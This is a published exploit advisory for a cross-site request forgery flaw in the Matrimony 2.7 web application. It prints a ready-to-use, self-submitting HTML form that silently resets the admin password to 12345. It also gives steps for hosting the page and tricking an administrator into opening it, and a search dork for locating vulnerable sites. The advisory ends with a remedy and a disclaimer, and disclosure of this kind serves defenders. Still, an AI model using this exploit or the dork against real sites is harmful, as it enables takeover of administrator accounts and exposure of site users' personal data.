# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # <!-- # Exploit Title: Matrimony 2.7 ( Admin account takeover ) Cross site request forgery # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer # Dork: inurl:simplesearch_results.php # Date: 28.08.2017 # Vendor Homepage: http://www.scubez.net/ # Software Demo Link: live.mscript.in [ administrator control panel been disabled after reporting the vulnerability ] # Version: 2.7 # Category: Webapps # Tested on: windows 7 / mozila firefox # # --> # ======================================================== # # # Matrimony 2.7 ( Admin account takeover ) Cross site request forgery # # Description : change password functionality in the admin panel does not check for current password and no CSRF token in place which allow # an Attackers to be able to completely compromise the admin account by changing the password for the [ Admin ] account which is the default name # # exploitation code : - <html> <body> <form name="csrf_form" action="http://vulnerablesite/admin/adminpass_submit.php" method="post"> <input name="txtp" id="txtp" type="hidden" value="12345"> <input name="txtcp" id="txtcp" type="hidden" value="12345"> <!-- <input name="Submit" value="Submit" type="submit"> --> <script type="text/javascript">document.csrf_form.submit();</script> </body> </html> # Steps to produce : - # 1) host the above code in the cloud # 2) trick the admin to visit the page # 3) password will be changed to 12345 # 4) attacker can navigate to the admin panel http://localhost/script/admin/login.php # 5) attacker should be able to login with new credentials as ( Admin ) since its the default account # # # # Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin # and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data.. # # # Remedy : developer should implement a check for current password and use CSRF token for each request # # # # ======================================================== # [+] Disclaimer # # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and that due # credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit is given to # the author. The author is not responsible for any misuse of the information contained # herein and prohibits any malicious use of all security related information # or exploits by the author or elsewhere. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #